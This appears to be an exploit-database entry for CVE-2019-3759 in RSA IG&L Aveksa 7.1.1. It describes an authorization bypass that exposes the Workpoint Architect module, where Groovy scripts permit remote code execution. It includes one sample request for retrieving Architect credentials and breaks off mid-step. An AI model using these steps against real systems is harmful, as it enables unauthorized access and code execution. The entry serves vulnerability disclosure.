# Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution # Date: 2019-04-16 # Exploit Author: Jakub Palaczynski, Lukasz Plonka # Vendor Homepage: https://www.rsa.com/ # Version: 7.1.1, prior to P02 # CVE : CVE-2019-3759 # (all vulnerable versions can be found at https://www.dell.com/support/security/pl-pl/details/DOC-106943/DSA-2019-134-RSA-Identity-Governance-and-Lifecycle-Product-Security-Update-for-Multiple-Vulnerabi) Information: Authenticated users can bypass authorization and get full access to Workpoint Architect module. This module gives possibility to run Groovy scripts which results in Code Execution. 1. First user needs to learn username and password for Architect (different from Aveksa login). Sample request: https://AVEKSA_HOST/aveksa/main?Oid=193783&ReqType=GetPartial&PageID=ChangeRequestJobPageData&WFObjectID=1%3AWPDS&crID=193783&isAjax=false search for "